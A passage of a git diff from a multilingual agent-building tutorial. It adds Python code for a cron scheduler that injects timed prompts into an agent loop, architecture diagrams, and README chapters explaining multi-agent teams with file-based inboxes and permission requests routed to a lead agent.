["install", "build", "test", "deploy", "compile", + "docker build", "pip install", "npm install", + "cargo build", "pytest", "make"] + return any(kw in cmd for kw in slow_keywords) + + +def execute_tool(block) -> str: + handler = { + "bash": run_bash, "read_file": run_read, "write_file": run_write, + "create_task": run_create_task, "list_tasks": run_list_tasks, + "claim_task": run_claim_task, "complete_task": run_complete_task, + "schedule_cron": run_schedule_cron, "list_crons": run_list_crons, + "cancel_cron": run_cancel_cron, + }.get(block.name) + if handler: + return handler(**block.input) + return f"Unknown tool: {block.name}" + + +def run_in_background(tool_use_id: str, fn, *args): + def worker(): + result = fn(*args) + with background_lock: + background_results[tool_use_id] = result + threading.Thread(target=worker, daemon=True).start() + print(f" \033[33m[background] dispatched {tool_use_id[:12]}...\033[0m") + + +def collect_background_results() -> dict[str, str]: + with background_lock: + ready = dict(background_results) + background_results.clear() + if ready: + for tid in ready: + print(f" \033[32m[background done] {tid[:12]}...\033[0m") + return ready + + +# ── Cron Scheduler (s14 new) ── + +DURABLE_PATH = WORKDIR / ".scheduled_tasks.json" + + +@dataclass +class CronJob: + id: str + cron: str # "0 9 * * *" + prompt: str # message to inject when fired + recurring: bool # True = recurring, False = one-shot + durable: bool # True = persist to disk + + +scheduled_jobs: dict[str, CronJob] = {} +cron_queue: list[CronJob] = [] +cron_lock = threading.Lock() +_last_fired: dict[str, int] = {} # job_id → minute_marker (prevent double-fire) + + +def _cron_field_matches(field: str, value: int) -> bool: + """Match a single cron field against a value.""" + if field == "*": + return True + if field.startswith("*/"): + step = int(field[2:]) + return step > 0 and value % step == 0 + if "," in field: + return any(_cron_field_matches(f.strip(), value) + for f in field.split(",")) + if "-" in field: + lo, hi = field.split("-", 1) + return int(lo) <= value <= int(hi) + return value == int(field) + + +def cron_matches(cron_expr: str, dt: datetime) -> bool: + """Check if a 5-field cron expression matches the given datetime.""" + fields = cron_expr.strip().split() + if len(fields) != 5: + return False + minute, hour, dom, month, dow = fields + # dow: Python weekday() Monday=0..Sunday=6 → cron Sunday=0 + dow_val = (dt.weekday() + 1) % 7 + return all([ + _cron_field_matches(minute, dt.minute), + _cron_field_matches(hour, dt.hour), + _cron_field_matches(dom, dt.day), + _cron_field_matches(month, dt.month), + _cron_field_matches(dow, dow_val), + ]) + + +def save_durable_jobs(): + """Persist durable jobs to .scheduled_tasks.json.""" + durable = [asdict(j) for j in scheduled_jobs.values() if j.durable] + DURABLE_PATH.write_text(json.dumps(durable, indent=2)) + + +def load_durable_jobs(): + """Load durable jobs from disk on startup.""" + if not DURABLE_PATH.exists(): + return + try: + jobs = json.loads(DURABLE_PATH.read_text()) + for j in jobs: + job = CronJob(**j) + scheduled_jobs[job.id] = job + if jobs: + print(f" \033[35m[cron] loaded {len(jobs)} durable job(s)\033[0m") + except Exception: + pass + + +def schedule_job(cron: str, prompt: str, recurring: bool = True, + durable: bool = True) -> CronJob: + """Register a new cron job.""" + job = CronJob( + id=f"cron_{random.randint(0, 999999):06d}", + cron=cron, prompt=prompt, + recurring=recurring, durable=durable, + ) + with cron_lock: + scheduled_jobs[job.id] = job + if durable: + save_durable_jobs() + print(f" \033[35m[cron register] {job.id} '{cron}' → {prompt[:40]}\033[0m") + return job + + +def cancel_job(job_id: str) -> str: + """Cancel a cron job.""" + with cron_lock: + job = scheduled_jobs.pop(job_id, None) + if not job: + return f"Job {job_id} not found" + if job.durable: + save_durable_jobs() + print(f" \033[31m[cron cancel] {job_id}\033[0m") + return f"Cancelled {job_id}" + + +def cron_scheduler_loop(): + """Independent daemon thread: poll every 1s, fire matching jobs.""" + while True: + time.sleep(1) + now = datetime.now() + minute_marker = now.hour * 60 + now.minute + with cron_lock: + for job in list(scheduled_jobs.values()): + if cron_matches(job.cron, now): + if _last_fired.get(job.id) != minute_marker: + cron_queue.append(job) + _last_fired[job.id] = minute_marker + print(f" \033[35m[cron fire] {job.id} → " + f"{job.prompt[:40]}\033[0m") + if not job.recurring: + scheduled_jobs.pop(job.id, None) + if job.durable: + save_durable_jobs() + + +def consume_cron_queue() -> list[CronJob]: + """Consume fired jobs from cron_queue (called by agent_loop).""" + with cron_lock: + fired = list(cron_queue) + cron_queue.clear() + return fired + + +# Load durable jobs on startup, then start scheduler thread +load_durable_jobs() +threading.Thread(target=cron_scheduler_loop, daemon=True).start() +print(" \033[35m[cron] scheduler thread started\033[0m") + + +# ── Cron Tools ── + +def run_schedule_cron(cron: str, prompt: str, + recurring: bool = True, durable: bool = True) -> str: + job = schedule_job(cron, prompt, recurring, durable) + return f"Scheduled {job.id}: '{cron}' → {prompt}" + + +def run_list_crons() -> str: + with cron_lock: + jobs = list(scheduled_jobs.values()) + if not jobs: + return "No cron jobs. Use schedule_cron to add one." + lines = [] + for j in jobs: + tag = "recurring" if j.recurring else "one-shot" + dur = "durable" if j.durable else "session" + lines.append(f" {j.id}: '{j.cron}' → {j.prompt[:40]} " + f"[{tag}, {dur}]") + return "\n".join(lines) + + +def run_cancel_cron(job_id: str) -> str: + return cancel_job(job_id) + + +# ── Tool Definitions ── + +TOOLS = [ + {"name": "bash", "description": "Run a shell command.", + "input_schema": {"type": "object", + "properties": {"command": {"type": "string"}}, + "required": ["command"]}}, + {"name": "read_file", "description": "Read file contents.", + "input_schema": {"type": "object", + "properties": {"path": {"type": "string"}, + "limit": {"type": "integer"}}, + "required": ["path"]}}, + {"name": "write_file", "description": "Write content to a file.", + "input_schema": {"type": "object", + "properties": {"path": {"type": "string"}, + "content": {"type": "string"}}, + "required": ["path", "content"]}}, + {"name": "create_task", + "description": "Create a new task with optional blockedBy dependencies.", + "input_schema": {"type": "object", + "properties": { + "subject": {"type": "string"}, + "description": {"type": "string"}, + "blockedBy": {"type": "array", + "items": {"type": "string"}}}, + "required": ["subject"]}}, + {"name": "list_tasks", + "description": "List all tasks with status, owner, and dependencies.", + "input_schema": {"type": "object", "properties": {}, + "required": []}}, + {"name": "claim_task", + "description": "Claim a pending task.", + "input_schema": {"type": "object", + "properties": {"task_id": {"type": "string"}}, + "required": ["task_id"]}}, + {"name": "complete_task", + "description": "Complete an in-progress task.", + "input_schema": {"type": "object", + "properties": {"task_id": {"type": "string"}}, + "required": ["task_id"]}}, + {"name": "schedule_cron", + "description": "Schedule a cron job. cron is 5-field: min hour dom month dow.", + "input_schema": {"type": "object", + "properties": { + "cron": {"type": "string", + "description": "5-field cron expression"}, + "prompt": {"type": "string", + "description": "Message to inject when fired"}, + "recurring": {"type": "boolean", + "description": "True=recurring, False=one-shot"}, + "durable": {"type": "boolean", + "description": "True=persist to disk"}}, + "required": ["cron", "prompt"]}}, + {"name": "list_crons", + "description": "List all registered cron jobs.", + "input_schema": {"type": "object", "properties": {}, + "required": []}}, + {"name": "cancel_cron", + "description": "Cancel a cron job by ID.", + "input_schema": {"type": "object", + "properties": {"job_id": {"type": "string"}}, + "required": ["job_id"]}}, +] + + +# ── Context ── + +def update_context(context: dict, messages: list) -> dict: + text = " ".join(str(m.get("content", ""))[:200] + for m in messages[-6:]).lower() + return {"has_todos": "task" in text or "todo" in text, + "has_skills": "skill" in text, + "has_cron": "cron" in text or "schedule" in text, + "memories": context.get("memories", "")} + + +# ── Agent Loop ── + +def agent_loop(messages: list, context: dict): + system = get_system_prompt(context) + while True: + # Consume fired cron jobs → inject as messages + fired = consume_cron_queue() + for job in fired: + messages.append({"role": "user", + "content": f"[Scheduled] {job.prompt}"}) + print(f" \033[35m[inject cron] {job.prompt[:50]}\033[0m") + + try: + response = client.messages.create( + model=MODEL, system=system, messages=messages, + tools=TOOLS, max_tokens=8000) + except Exception as e: + messages.append({"role": "assistant", "content": [ + {"type": "text", + "text": f"[Error] {type(e).__name__}: {e}"}]}) + return + + messages.append({"role": "assistant", "content": response.content}) + if response.stop_reason != "tool_use": + return + + results = [] + for block in response.content: + if block.type != "tool_use": + continue + print(f"\033[36m> {block.name}\033[0m") + + if is_slow_operation(block.name, block.input): + run_in_background(block.id, execute_tool, block) + results.append({"type": "tool_result", + "tool_use_id": block.id, + "content": "[Running in background...]"}) + else: + output = execute_tool(block) + print(str(output)[:300]) + results.append({"type": "tool_result", + "tool_use_id": block.id, + "content": output}) + + # Inject completed background results + bg_results = collect_background_results() + if bg_results: + bg_content = [{"type": "tool_result", + "tool_use_id": tid, "content": out} + for tid, out in bg_results.items()] + messages.append({"role": "user", "content": bg_content}) + + messages.append({"role": "user", "content": results}) + context = update_context(context, messages) + system = get_system_prompt(context) + + +if __name__ == "__main__": + print("s14: cron scheduler") + print("Enter a question, press Enter to send. Type q to quit.\n") + history = [] + context = {"has_todos": False, "has_skills": False, + "has_cron": False, "memories": ""} + while True: + try: + query = input("\033[36ms14 >> \033[0m") + except (EOFError, KeyboardInterrupt): + break + if query.strip().lower() in ("q", "exit", ""): + break + history.append({"role": "user", "content": query}) + agent_loop(history, context) + context = update_context(context, history) + for block in history[-1]["content"]: + if getattr(block, "type", None) == "text": + print(block.text) + print() diff --git a/s14_cron_scheduler/images/cron-scheduler-overview.en.svg b/s14_cron_scheduler/images/cron-scheduler-overview.en.svg new file mode 100644 index 000000000..fe9de1fe7 --- /dev/null +++ b/s14_cron_scheduler/images/cron-scheduler-overview.en.svg @@ -0,0 +1,125 @@ + + + + + + + + + + + + + + + + + + + Cron Scheduler — Independent scheduler thread + cron_queue injection point + + + + s10-s13 retained + + s14 new + + + + + + consume + cron_queue + ★ s14 injection + + + + + + messages + + + + + + prompt + cache + assemble_system_prompt + (s10) + + + + + + LLM (try/except) + with_retry + (s11) + + + + + + TOOL DISPATCH + fast → sync (bash, read, write) + slow → background thread (s13) + cron → schedule_cron, list, cancel (s14) + task → create, list, claim, complete (s12) + + + + loop back: tool_results → next turn + + + + cron_scheduler_loop (daemon thread) + time.sleep(1) → cron_matches(job.cron, now) + match → cron_queue.append(job) + minute_marker prevents double-fire per minute + one-shot jobs auto-delete after firing + + + + + + + cron_queue + cron_lock · scheduler writes · loop reads + + + + inject each turn + + + + CronJob + Persistence + CronJob dataclass: + id, cron, prompt, recurring, durable + Durable → .scheduled_tasks.json + restored via load_durable_jobs after restart + Session-only → memory only + lost when process exits + ⚠ Process exit = scheduler stops (not OS-level crontab) + + + + 5-field Cron Expression + + * + + * + + * + + * + + * + min + hour + day + month + dow + + */5 * * * * → every 5 minutes + 0 9 * * 1-5 → weekdays 9:00 + 0 9 * * * → daily 9:00 + Supports: *, */N, N, N-M, N,M,... + diff --git a/s14_cron_scheduler/images/cron-scheduler-overview.ja.svg b/s14_cron_scheduler/images/cron-scheduler-overview.ja.svg new file mode 100644 index 000000000..daf20a880 --- /dev/null +++ b/s14_cron_scheduler/images/cron-scheduler-overview.ja.svg @@ -0,0 +1,125 @@ + + + + + + + + + + + + + + + + + + + Cron Scheduler — 独立スケジューラスレッド + cron_queue 注入ポイント + + + + s10-s13 維持 + + s14 新規 + + + + + + consume + cron_queue + ★ s14 注入点 + + + + + + messages + + + + + + prompt + cache + assemble_system_prompt + (s10) + + + + + + LLM (try/except) + with_retry + (s11) + + + + + + TOOL DISPATCH + fast → sync (bash, read, write) + slow → background thread (s13) + cron → schedule_cron, list, cancel (s14) + task → create, list, claim, complete (s12) + + + + loop back: tool_results → next turn + + + + cron_scheduler_loop (daemon スレッド) + time.sleep(1) → cron_matches(job.cron, now) + マッチ → cron_queue.append(job) + minute_marker で同一分の重複発火を防止 + 一度きりのタスクは発火後自動削除 + + + + + + + cron_queue + cron_lock · スケジューラ書込 · loop 読込 + + + + 毎ターン注入 + + + + CronJob + 永続化 + CronJob dataclass: + id, cron, prompt, recurring, durable + Durable → .scheduled_tasks.json + 再起動後 load_durable_jobs で復元 + Session-only → メモリのみ + プロセス終了で消失 + ⚠ プロセス終了 = スケジューラ停止(OS レベルの crontab ではない) + + + + 5 フィールド Cron 式 + + * + + * + + * + + * + + * + + + + + 曜日 + + */5 * * * * → 5 分ごと + 0 9 * * 1-5 → 平日 9:00 + 0 9 * * * → 毎日 9:00 + 対応: *, */N, N, N-M, N,M,... + diff --git a/s14_cron_scheduler/images/cron-scheduler-overview.svg b/s14_cron_scheduler/images/cron-scheduler-overview.svg new file mode 100644 index 000000000..94cf77b88 --- /dev/null +++ b/s14_cron_scheduler/images/cron-scheduler-overview.svg @@ -0,0 +1,125 @@ + + + + + + + + + + + + + + + + + + + Cron Scheduler — 独立调度线程 + cron_queue 注入点 + + + + s10-s13 保留 + + s14 新增 + + + + + + consume + cron_queue + ★ s14 注入点 + + + + + + messages + + + + + + prompt + cache + assemble_system_prompt + (s10) + + + + + + LLM (try/except) + with_retry + (s11) + + + + + + TOOL DISPATCH + fast → sync (bash, read, write) + slow → background thread (s13) + cron → schedule_cron, list, cancel (s14) + task → create, list, claim, complete (s12) + + + + loop back: tool_results → next turn + + + + cron_scheduler_loop(独立 daemon 线程) + time.sleep(1) → cron_matches(job.cron, now) + 匹配 → cron_queue.append(job) + minute_marker 防同分钟重复触发 + 一次性任务触发后自动删除 + + + + + + + cron_queue + cron_lock 保护 · 调度线程写 · agent_loop 读 + + + + 每轮注入 + + + + CronJob + 持久化 + CronJob dataclass: + id, cron, prompt, recurring, durable + Durable → .scheduled_tasks.json + 重启后 load_durable_jobs 恢复 + Session-only → 内存 only + 进程关闭即丢 + ⚠ 进程关闭 = 调度停止(不是 OS 级 crontab) + + + + 五段式 Cron 表达式 + + * + + * + + * + + * + + * + 分钟 + 小时 + + + 星期 + + */5 * * * * → 每 5 分钟 + 0 9 * * 1-5 → 工作日 9:00 + 0 9 * * * → 每天 9:00 + 支持: *, */N, N, N-M, N,M,... + diff --git a/s15_agent_teams/README.en.md b/s15_agent_teams/README.en.md new file mode 100644 index 000000000..620dde5ce --- /dev/null +++ b/s15_agent_teams/README.en.md @@ -0,0 +1,259 @@ +# s15: Agent Teams — One Can't Do It Alone, Form a Team + +[中文](README.md) · [English](README.en.md) · [日本語](README.ja.md) + +s01 → ... → s13 → s14 → `s15` → [s16](../s16_team_protocols/) → s17 → s18 → s19 + +> *"One can't do it alone, form a team"* — Persistent teammates + async mailboxes. +> +> **Harness Layer**: Teams — Multi-agent collaboration, message bus. + +--- + +## The Problem + +A restaurant kitchen doesn't have one person doing everything. The chef cooks, the prep cook prepares ingredients, the dishwasher washes dishes — each handles their own domain, passing dishes through the window. If the chef had to both cook and wash dishes, the output would be slow, and the dishes wouldn't be clean. + +Same with agents. "Refactor the entire backend" involves the auth module, database layer, API routes, and tests. One agent working on API routes will forget the details of the auth module. The context window is only so big. + +s06's sub-agents are temporary workers — called in for one task and then gone. But some tasks require persistent teammates who can communicate at any time. + +--- + +## The Solution + +![Agent Teams Overview](images/agent-teams-overview.en.svg) + +All of s14's capabilities are preserved (prompt assembly, error recovery, task graph, background threads, cron scheduling). Three additions: **MessageBus** (file inboxes), **spawn_teammate_thread** (launch teammate threads), **inbox polling** (Lead receives teammate messages). + +Sub-agents vs Teammates: + +| | s06 Sub-agent | s15 Teammate | +|---|---|---| +| Lifecycle | One-shot, destroyed after use | Persistent, alive until done or shut down | +| Communication | Only returns final conclusion | Async inbox, communicate anytime | +| Context | Fully isolated | Share information via messages | +| Count | One main agent + occasional sub-agent | One Lead + multiple teammates | + +--- + +## How It Works + +![Team Topology](images/team-topology.en.svg) + +### MessageBus: File Inboxes + +Every agent (including Lead and teammates) has a `.jsonl` mailbox. Sending a message = appending a JSON line to the recipient's file. Reading messages = reading the file + deleting (consumption mode): + +```python +class MessageBus: + def send(self, from_agent: str, to_agent: str, + content: str, msg_type: str = "message"): + msg = {"from": from_agent, "to": to_agent, + "content": content, "type": msg_type, + "ts": time.time()} + inbox = MAILBOX_DIR / f"{to_agent}.jsonl" + with open(inbox, "a") as f: + f.write(json.dumps(msg) + "\n") + + def read_inbox(self, agent: str) -> list[dict]: + inbox = MAILBOX_DIR / f"{agent}.jsonl" + if not inbox.exists(): + return [] + msgs = [json.loads(line) for line in inbox.read_text().splitlines()] + inbox.unlink() # Consumption: delete after reading + return msgs +``` + +Why files instead of in-memory queues? Because file appends are cross-thread safe (atomic append), and the tutorial doesn't need complex locks like `proper-lockfile`. CC also uses file inboxes (`~/.claude/teams/{team}/inboxes/`), just with file locks to prevent concurrent write conflicts. + +### spawn_teammate_thread: Launch Teammates + +The Lead calls the `spawn_teammate` tool to launch a teammate. The teammate runs in its own daemon thread, with its own system prompt, its own messages, and its own simplified tool set: + +```python +def spawn_teammate_thread(name: str, role: str, prompt: str) -> str: + system = f"You are '{name}', a {role}. Use tools to complete tasks." + + def run(): + messages = [{"role": "user", "content": prompt}] + sub_tools = [bash, read_file, write_file, send_message] + for _ in range(10): # Max 10 rounds + inbox = BUS.read_inbox(name) + if inbox: + messages.append({"role": "user", + "content": f"{json.dumps(inbox)}"}) + response = client.messages.create( + model=MODEL, system=system, messages=messages[-20:], + tools=sub_tools, max_tokens=8000) + # ... execute tools, handle results + # When done, send summary to Lead + BUS.send(name, "lead", summary, "result") + + threading.Thread(target=run, daemon=True).start() +``` + +Key design decisions: +- **Teammates have a simplified tool set**: bash, read, write, send_message. They don't need cron, task system, or other Lead-exclusive tools +- **Maximum 10 rounds**: prevents teammates from looping infinitely +- **Auto-report when done**: `BUS.send(name, "lead", summary)` sends the final result to Lead's inbox + +### Lead's Inbox Polling + +After each main loop iteration, Lead checks its inbox — any messages from teammates: + +```python +# After main loop iteration +inbox = BUS.read_inbox("lead") +if inbox: + print(f"[Inbox: {len(inbox)} messages]") + for msg in inbox: + print(f" From {msg['from']}: {msg['content'][:200]}") +``` + +The tutorial polls outside the loop. CC is more refined — Lead's `useInboxPoller` checks every 1 second and submits new messages as a new turn. + +### Permission Bubbling + +When a teammate encounters an operation requiring approval (e.g., deleting a file), it can't decide on its own. It sends a `permission_request` message to Lead, who makes the final decision: + +``` +teammate: "I need to delete config.py" → BUS.send("alice", "lead", "...", "permission_request") +Lead: receives request → user approval → BUS.send("lead", "alice", "approved") +teammate: receives reply → continues execution +``` + +The tutorial simplifies permission bubbling. CC has a dedicated `useSwarmPermissionPoller` that polls every 500ms, with 15 structured message types. + +### Putting It Together + +``` +1. Lead: "Build the backend: one agent can't do it, let's form a team" +2. Lead → spawn_teammate("alice", "backend dev", "Create database schema") +3. Lead → spawn_teammate("bob", "frontend dev", "Write API client") +4. alice thread starts → own LLM calls → bash "python manage.py migrate" +5. bob thread starts → own LLM calls → write_file("client.ts", ...) +6. alice finishes → BUS.send("alice", "lead", "Schema done: users, orders tables") +7. bob finishes → BUS.send("bob", "lead", "Client written with types") +8. Lead next iteration → check_inbox → sees alice and bob's results +``` + +Two teammates work in parallel, Lead doesn't wait idly. + +--- + +## Changes from s14 + +| Component | Before (s14) | After (s15) | +|-----------|-------------|-------------| +| Agent count | 1 | 1 Lead + N persistent teammate threads | +| Communication | None | MessageBus + .mailboxes/*.jsonl | +| New classes | — | MessageBus, active_teammates dict | +| New functions | — | spawn_teammate_thread, run_send_message, run_check_inbox | +| Lead tools | 10 (s14) | + spawn_teammate, send_message, check_inbox (13) | +| Teammate tools | — | bash, read_file, write_file, send_message (4) | +| Permissions | Local decision | Bubble to Lead (simplified in tutorial) | + +--- + +## Try It + +```sh +cd learn-claude-code +python s15_agent_teams/code.py +``` + +Try these prompts: + +1. `Spawn alice as a backend developer. Ask her to create a file called schema.sql with a users table.` +2. `Check your inbox for alice's result.` +3. `Spawn bob as a tester. Ask him to check if schema.sql exists and list its contents.` + +What to observe: How does Lead launch teammates? What do the `.mailboxes/` JSONL files look like? Does Lead's inbox receive messages when teammates finish? + +--- + +## What's Next + +Teammates can work and communicate. But if Lead wants Alice to shut down, killing the thread directly would leave half-written files. A graceful handshake protocol is needed — "please shut down" → "OK, let me finish up and I'll close." + +s16 Team Protocols → Teammates need conventions too. + +
+Deep Dive into CC Source + +> The following is a complete analysis based on CC source code `spawnMultiAgent.ts`, `useInboxPoller.ts` (969 lines), `useSwarmPermissionPoller.ts` (330 lines), `teammateMailbox.ts`, `teamHelpers.ts`. + +### 1. No Central Message Bus — It's the Filesystem + +The tutorial uses a `MessageBus` class to send/receive messages. CC's approach is more direct: **each agent directly writes to other agents' inbox files**. + +Inbox path: `~/.claude/teams/{teamName}/inboxes/{agentName}.json` + +Writes use `proper-lockfile` for concurrency safety (up to 10 retries). Each file is a JSON array; appending reads → appends → writes back. + +### 2. 15 Message Types + +CC's team communication has 15 structured messages (`teammateMailbox.ts`): + +| Type | Direction | Purpose | +|------|-----------|---------| +| `plain text` | Bidirectional | Normal inter-teammate communication | +| `idle_notification` | Teammate→Lead | Teammate finished a turn, now idle | +| `permission_request` | Teammate→Lead | Teammate needs operation approval | +| `permission_response` | Lead→Teammate | Lead's approval result | +| `plan_approval_request` | Teammate→Lead | Teammate submits plan for review | +| `plan_approval_response` | Lead→Teammate | Lead reviews plan | +| `shutdown_request` | Lead→Teammate | Request graceful shutdown | +| `shutdown_approved` | Teammate→Lead | Confirms shutdown | +| `shutdown_rejected` | Teammate→Lead | Rejects shutdown (with reason) | +| `task_assignment` | Lead→Teammate | Assign task | +| `team_permission_update` | Lead→Teammate | Broadcast permission change | +| `mode_set_request` | Lead→Teammate | Change teammate's permission mode | +| `sandbox_permission_*` | Bidirectional | Network permission request/reply | +| `teammate_terminated` | System | Teammate removed notification | + +Text messages are wrapped in `` XML tags for delivery to the model. + +### 3. Permission Bubbling: Dual Polling + +The tutorial simplifies permission bubbling. CC's actual flow (`permissionSync.ts`): + +1. **Teammate** encounters an operation requiring approval → sends `permission_request` to Lead's inbox +2. **Lead's** `useInboxPoller` (polls every 1 second) detects the request → routes to `ToolUseConfirmQueue` +3. Lead's UI shows approval dialog with teammate name and color +4. After user approval → Lead sends `permission_response` back to teammate's inbox +5. **Teammate's** `useSwarmPermissionPoller` (polls every 500ms) receives reply → continues or rejects execution + +### 4. Teammate Lifecycle + +CC teammates are created by `spawnTeammate()` (`spawnMultiAgent.ts`): + +1. **Spawn**: Create tmux pane (or in-process), assign color, write to team config +2. **Work**: `useInboxPoller` checks inbox every 1 second → new messages become new turns +3. **Idle**: Stop hook fires → sends `idle_notification` to Lead +4. **Shutdown**: Lead sends `shutdown_request` → teammate replies `shutdown_approved` → Lead cleans up + +### 5. Team Config + +Team registry at `~/.claude/teams/{teamName}/config.json` (`teamHelpers.ts`): + +```json +{ + "name": "my-team", + "leadAgentId": "lead@my-team", + "members": [{ + "agentId": "researcher@my-team", + "name": "researcher", + "agentType": "general-purpose", + "color": "blue", + "isActive": true + }] +} +``` + +Teammates cannot nest (`AgentTool.tsx:273` explicitly prohibits "teammates spawning other teammates"). + +
+ + diff --git a/s15_agent_teams/README.ja.md b/s15_agent_teams/README.ja.md new file mode 100644 index 000000000..a2f503edf --- /dev/null +++ b/s15_agent_teams/README.ja.md @@ -0,0 +1,259 @@ +# s15: Agent Teams — 一人で無理なら、チームで + +[中文](README.md) · [English](README.en.md) · [日本語](README.ja.md) + +s01 → ... → s13 → s14 → `s15` → [s16](../s16_team_protocols/) → s17 → s18 → s19 + +> *"一人で無理なら、チームで"* — 永続化チームメイト + 非同期メールボックス。 +> +> **Harness 層**: チーム — マルチ Agent 協調、メッセージバス。 + +--- + +## 課題 + +レストランの厨房は一人で全部やるわけではない。シェフが調理、助手が仕込み、皿洗いが洗浄 — それぞれの担当があり、窓越しに料理を渡す。シェフに調理と皿洗いの両方をさせたら、提供は遅く、皿も汚いまま。 + +Agent も同じ。「バックエンド全体をリファクタリング」には認証モジュール、データベース層、API ルート、テストが含まれる。1 Agent が API ルートを修正中に認証モジュールの詳細を忘れる。コンテキストウィンドウは限られている。 + +s06 のサブエージェントは臨時スタッフ — 一つの用事で呼んで帰す。しかし、一部のタスクにはいつでも通信できる永続的なチームメイトが必要。 + +--- + +## ソリューション + +![Agent Teams Overview](images/agent-teams-overview.ja.svg) + +s14 の全機能を保持(プロンプト組み立て、エラーリカバリ、タスクグラフ、バックグラウンドスレッド、cron スケジューリング)。3 つの追加:**MessageBus**(ファイル受信箱)、**spawn_teammate_thread**(チームメイトスレッド起動)、**inbox ポーリング**(Lead がチームメイトのメッセージを受信)。 + +サブエージェント vs チームメイト: + +| | s06 サブエージェント | s15 チームメイト | +|---|---|---| +| ライフサイクル | 使い捨て、終了後に破棄 | 永続的、完了または終了まで存続 | +| 通信 | 結論のみ返却 | 非同期受信箱、いつでも通信 | +| コンテキスト | 完全に隔離 | メッセージで情報共有 | +| 数 | 1 メイン Agent + 随時サブ Agent | 1 Lead + 複数チームメイト | + +--- + +## 仕組み + +![Team Topology](images/team-topology.ja.svg) + +### MessageBus: ファイル受信箱 + +各 Agent(Lead とチームメイトを含む)は `.jsonl` メールボックスを持つ。メッセージ送信 = 相手のファイルに JSON 行を追記。メッセージ読み取り = ファイルを読んで削除(消費方式): + +```python +class MessageBus: + def send(self, from_agent: str, to_agent: str, + content: str, msg_type: str = "message"): + msg = {"from": from_agent, "to": to_agent, + "content": content, "type": msg_type, + "ts": time.time()} + inbox = MAILBOX_DIR / f"{to_agent}.jsonl" + with open(inbox, "a") as f: + f.write(json.dumps(msg) + "\n") + + def read_inbox(self, agent: str) -> list[dict]: + inbox = MAILBOX_DIR / f"{agent}.jsonl" + if not inbox.exists(): + return [] + msgs = [json.loads(line) for line in inbox.read_text().splitlines()] + inbox.unlink() # 消費方式:読んだら削除 + return msgs +``` + +なぜメモリキューではなくファイル?ファイル追記はスレッド間で安全(原子的 append)、チュートリアルでは `proper-lockfile` のような複雑なロックが不要。CC もファイル受信箱を使う(`~/.claude/teams/{team}/inboxes/`)、ただし並行書き込み衝突を防ぐファイルロック付き。 + +### spawn_teammate_thread: チームメイト起動 + +Lead が `spawn_teammate` ツールを呼び出してチームメイトを起動。チームメイトは独自のデーモンスレッドで実行され、独自の system prompt、独自の messages、独自の簡易ツールセットを持つ: + +```python +def spawn_teammate_thread(name: str, role: str, prompt: str) -> str: + system = f"You are '{name}', a {role}. Use tools to complete tasks." + + def run(): + messages = [{"role": "user", "content": prompt}] + sub_tools = [bash, read_file, write_file, send_message] + for _ in range(10): # 最大 10 ラウンド + inbox = BUS.read_inbox(name) + if inbox: + messages.append({"role": "user", + "content": f"{json.dumps(inbox)}"}) + response = client.messages.create( + model=MODEL, system=system, messages=messages[-20:], + tools=sub_tools, max_tokens=8000) + # ... ツール実行、結果処理 + # 完了後 Lead に summary を送信 + BUS.send(name, "lead", summary, "result") + + threading.Thread(target=run, daemon=True).start() +``` + +主要設計: +- **チームメイトは簡易ツールセット**:bash、read、write、send_message。cron やタスクシステムなどの Lead 専用ツールは不要 +- **最大 10 ラウンド**:チームメイトの無限ループを防止 +- **完了後の自動報告**:`BUS.send(name, "lead", summary)` で最終結果を Lead の受信箱に送信 + +### Lead の inbox ポーリング + +Lead は各メインループ終了後、受信箱をチェック — チームメイトからのメッセージがあるか: + +```python +# メインループ終了後 +inbox = BUS.read_inbox("lead") +if inbox: + print(f"[Inbox: {len(inbox)} messages]") + for msg in inbox: + print(f" From {msg['from']}: {msg['content'][:200]}") +``` + +チュートリアル版はループ外でポーリング。CC はより洗練されており — Lead の `useInboxPoller` が 1 秒ごとにチェックし、新しいメッセージを新しいターンとして提出。 + +### 権限バブリング + +チームメイトが承認が必要な操作(ファイル削除など)に遭遇した場合、自分で決定できない。`permission_request` メッセージを Lead に送り、Lead が最終決定: + +``` +teammate: "config.py を削除したい" → BUS.send("alice", "lead", "...", "permission_request") +Lead: リクエスト受信 → ユーザー承認 → BUS.send("lead", "alice", "approved") +teammate: 返信受信 → 実行継続 +``` + +チュートリアル版は権限バブリングを簡略化。CC には専用の `useSwarmPermissionPoller` が 500ms ごとにポーリングし、15 の構造化メッセージタイプがある。 + +### 組み合わせて実行 + +``` +1. Lead: "バックエンド構築:一人で無理、チームを組もう" +2. Lead → spawn_teammate("alice", "backend dev", "データベース schema を作成") +3. Lead → spawn_teammate("bob", "frontend dev", "API クライアントを記述") +4. alice スレッド起動 → 独自の LLM 呼び出し → bash "python manage.py migrate" +5. bob スレッド起動 → 独自の LLM 呼び出し → write_file("client.ts", ...) +6. alice 完了 → BUS.send("alice", "lead", "Schema done: users, orders tables") +7. bob 完了 → BUS.send("bob", "lead", "Client written with types") +8. Lead 次ループ → check_inbox → alice と bob の結果を確認 +``` + +2 人のチームメイトが並行作業、Lead は待たない。 + +--- + +## s14 からの変更 + +| コンポーネント | 変更前 (s14) | 変更後 (s15) | +|--------------|------------|------------| +| Agent 数 | 1 | 1 Lead + N 永続チームメイトスレッド | +| 通信 | なし | MessageBus + .mailboxes/*.jsonl | +| 新規クラス | — | MessageBus, active_teammates dict | +| 新規関数 | — | spawn_teammate_thread, run_send_message, run_check_inbox | +| Lead ツール | 10 (s14) | + spawn_teammate, send_message, check_inbox (13) | +| チームメイトツール | — | bash, read_file, write_file, send_message (4) | +| 権限 | ローカル決定 | Lead にバブリング(チュートリアル版は簡略化) | + +--- + +## 試してみる + +```sh +cd learn-claude-code +python s15_agent_teams/code.py +``` + +以下のプロンプトを試してください: + +1. `Spawn alice as a backend developer. Ask her to create a file called schema.sql with a users table.` +2. `Check your inbox for alice's result.` +3. `Spawn bob as a tester. Ask him to check if schema.sql exists and list its contents.` + +観察ポイント:Lead はどうやってチームメイトを起動するか?`.mailboxes/` ディレクトリの JSONL ファイルの中身は?チームメイト完了後に Lead の inbox にメッセージが届いているか? + +--- + +## 次の章 + +チームメイトは作業でき、通信もできる。しかし Lead が Alice に終了を指示する際、スレッドを直接 kill すると書きかけのファイルが残る。丁寧なハンドシェイクプロトコルが必要 — "終了してください" → "了解、終了処理をしてから閉じます"。 + +s16 Team Protocols → チームメイト間にも取り決めが必要。 + +
